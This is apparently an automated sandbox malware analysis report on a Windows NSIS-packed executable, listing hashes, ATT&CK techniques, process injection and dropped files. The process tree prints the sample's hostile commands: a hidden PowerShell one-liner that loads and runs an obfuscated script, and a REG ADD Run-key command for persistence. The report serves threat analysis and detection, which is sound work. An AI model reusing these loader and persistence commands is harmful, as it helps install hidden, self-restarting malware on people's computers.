49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436

General

Target

49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe
Size

568KB
MD5

e4370a31c71c37bde2e16022fa0459c2
SHA1

10890db50f2aac0931eec94f45e012944efed869
SHA256

49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436
SHA512

1454935b456d4fc26b978fb4a38ec34ba673ba27ccc23c9d73328441cbdfd78baade7173eefbd2d51ffa42cd8e20697521d0128f4f08b1800293c613ac60d5af
SSDEEP

12288:mH7MMIqb9BaBUbdD4aPHb2XR+MAghog0RdBBplW8Lmy:+7a69BWUhD3Ha+MPCXtlW8Lmy

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2656 powershell.exe

Loads dropped DLL 4 IoCs

Processes:

49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exepowershell.exeReimposing.exe

pid	process
2072	49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe
2072	49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe
2656	powershell.exe
2632	Reimposing.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Thecosomatous% -windowstyle minimized $Comfortress=(Get-ItemProperty -Path 'HKCU:\\Leyden\\').Inlet;%Thecosomatous% ($Comfortress)"	reg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeReimposing.exe

pid process

2656 powershell.exe
2632 Reimposing.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2656 set thread context of 2632 2656 powershell.exe Reimposing.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2656 set thread context of 2632	2656	powershell.exe	Reimposing.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Reimposing.exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\Reimposing.exe	nsis_installer_2

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

240 reg.exe

pid	process
240	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid	process
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2656 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2656 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exepowershell.exeReimposing.execmd.exe

description	pid	process	target process
PID 2072 wrote to memory of 2656	2072	49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe	powershell.exe
PID 2072 wrote to memory of 2656	2072	49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe	powershell.exe
PID 2072 wrote to memory of 2656	2072	49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe	powershell.exe
PID 2072 wrote to memory of 2656	2072	49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe	powershell.exe
PID 2656 wrote to memory of 2804	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2804	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2804	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2804	2656	powershell.exe	cmd.exe
PID 2656 wrote to memory of 2632	2656	powershell.exe	Reimposing.exe
PID 2656 wrote to memory of 2632	2656	powershell.exe	Reimposing.exe
PID 2656 wrote to memory of 2632	2656	powershell.exe	Reimposing.exe
PID 2656 wrote to memory of 2632	2656	powershell.exe	Reimposing.exe
PID 2656 wrote to memory of 2632	2656	powershell.exe	Reimposing.exe
PID 2656 wrote to memory of 2632	2656	powershell.exe	Reimposing.exe
PID 2632 wrote to memory of 2692	2632	Reimposing.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	Reimposing.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	Reimposing.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	Reimposing.exe	cmd.exe
PID 2692 wrote to memory of 240	2692	cmd.exe	reg.exe
PID 2692 wrote to memory of 240	2692	cmd.exe	reg.exe
PID 2692 wrote to memory of 240	2692	cmd.exe	reg.exe
PID 2692 wrote to memory of 240	2692	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe
"C:\Users\Admin\AppData\Local\Temp\49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Gadgetries=Get-Content 'C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Kahlil\Sheriffess.Sal';$Underpricing=$Gadgetries.SubString(522,3);.$Underpricing($Gadgetries)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
3⤵
PID:2804

C:\Users\Admin\AppData\Local\Temp\Reimposing.exe
"C:\Users\Admin\AppData\Local\Temp\Reimposing.exe"
3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Thecosomatous% -windowstyle minimized $Comfortress=(Get-ItemProperty -Path 'HKCU:\Leyden\').Inlet;%Thecosomatous% ($Comfortress)"
4⤵
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Thecosomatous% -windowstyle minimized $Comfortress=(Get-ItemProperty -Path 'HKCU:\Leyden\').Inlet;%Thecosomatous% ($Comfortress)"
5⤵
- Adds Run key to start application
- Modifies registry key
PID:240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Kahlil\Anatripsology.alg

Filesize
324KB

MD5
80eec5fb391699bbe7140849c0972f95

SHA1
4b1663c8d3f6ee1b54d560eb21eac017fb626b99

SHA256
6e3604b16b56cdfb18d777d677321bce6f4d60d1e3fff8318e183b9d56bcf4dc

SHA512
227322fabcd05fa1e433888982f1f4f78e0185ba16dd23662133f5778fa58652571945166131cfd7f1460067784637a3170ae759744c23c8b295f7f22b474f5f

Download Submit
C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Kahlil\Sheriffess.Sal

Filesize
50KB

MD5
197064b3c1ff1c585db3f2a0b7c2c44a

SHA1
f66e3acf12f2c5c120923519ec806c0eb3b40c6d

SHA256
c2a25450b4800c19f49a02faaf3d4d549c6ddef5c8632621fc69b3fe4c3efbd6

SHA512
4e17845a8a7dcd40e1aa929cd9ca9158b635aff3b2e188c28eb533c660eab6aef1ccd872c417c12b10127788e118ac17f5c6a2aad628a2de5596fe4cced58670

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\degum.lnk

Filesize
890B

MD5
18375fc0c94ed084018576230742b55c

SHA1
abc0b4b15f6b38c951e682aac0bdc822ba2121cd

SHA256
6e55591c9e36be66dfbd7e2b7e5f07a69b8f509f5493ad27922fa3bed37de41b

SHA512
921640f3474ddd3deae7836570c5b0846a881f2d6f6859b000a86adfa178d7e817861db0772ff960e3d2882486b93069562ed61d5231cae77f4f2c743bd42233

Download Submit
\Users\Admin\AppData\Local\Temp\Reimposing.exe

Filesize
568KB

MD5
e4370a31c71c37bde2e16022fa0459c2

SHA1
10890db50f2aac0931eec94f45e012944efed869

SHA256
49ffcfe176de375dbbb2e4d50043d80fa254ca6b4ffc6d18d9501b6d8841a436

SHA512
1454935b456d4fc26b978fb4a38ec34ba673ba27ccc23c9d73328441cbdfd78baade7173eefbd2d51ffa42cd8e20697521d0128f4f08b1800293c613ac60d5af

Download Submit
\Users\Admin\AppData\Local\Temp\nsd1C48.tmp\nsDialogs.dll

Filesize
9KB

MD5
1c8b2b40c642e8b5a5b3ff102796fb37

SHA1
3245f55afac50f775eb53fd6d14abb7fe523393d

SHA256
8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c

SHA512
4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

Download Submit
memory/2632-73-0x0000000000470000-0x00000000014D2000-memory.dmp

Filesize
16.4MB

Download
memory/2656-60-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-61-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-63-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-67-0x00000000066C0000-0x0000000009FA7000-memory.dmp

Filesize
56.9MB

Download
memory/2656-62-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-72-0x0000000074050000-0x00000000745FB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-59-0x0000000074051000-0x0000000074052000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads